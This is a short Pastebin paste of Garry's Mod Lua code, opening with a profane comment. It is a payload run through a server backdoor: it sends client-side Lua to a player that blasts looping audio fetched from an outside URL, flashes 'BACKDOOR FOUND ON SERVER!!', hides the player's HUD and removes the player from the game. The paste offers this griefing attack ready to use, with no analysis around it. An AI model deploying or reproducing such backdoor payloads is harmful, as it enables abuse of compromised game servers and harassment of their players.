2much4Us

welcome 2 hellsz

Mar 14th, 2018
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.03 KB | None | 0 0
  1. --FUCKING CUNTS
  2. lol:PushAction( 0, function( pPlayer )
  3. lol:SendLua( pPlayer, [[
  4. surface.PlaySound( "vo/npc/male01/gethellout.wav" )
  5.  
  6. local sounds = {}
  7. for i = 1, 4 do
  8. sound.PlayURL( "http://www.underdone.org/leak/underdone/asd.mp3", "noblock noplay", function( pChan )
  9. sounds[#sounds +1] = pChan
  10. end )
  11. end
  12.  
  13. draw.SimpleTextOutlined(
  14. "BACKDOOR FOUND ON SERVER!! ",
  15. "DermaLarge",
  16. ScrW() /2 +math.random( -8, 8 ),
  17. ScrH() /2 +math.random( -8, 8 ) +24,
  18. Color( 255, 0, 0 ),
  19. TEXT_ALIGN_CENTER,
  20. TEXT_ALIGN_CENTER,
  21. 1,
  22. Color( 255, 0, 0 )
  23. )
  24. end)
  25. timer.Create( "asdf", 1, 0, function()
  26. if #sounds ~= 4 then return end
  27. timer.Destroy( "asdf" )
  28. for k, v in pairs( sounds ) do v:EnableLooping( true ) v:SetVolume( 1 ) v:Play() end
  29. end )
  30.  
  31. hook.Add( "HUDShouldDraw", "newhud", function() return false end )
  32. ]] )
  33.  
  34. pPlayer:Remove()
  35. end )
Advertisement
Add Comment
Please, Sign In to add comment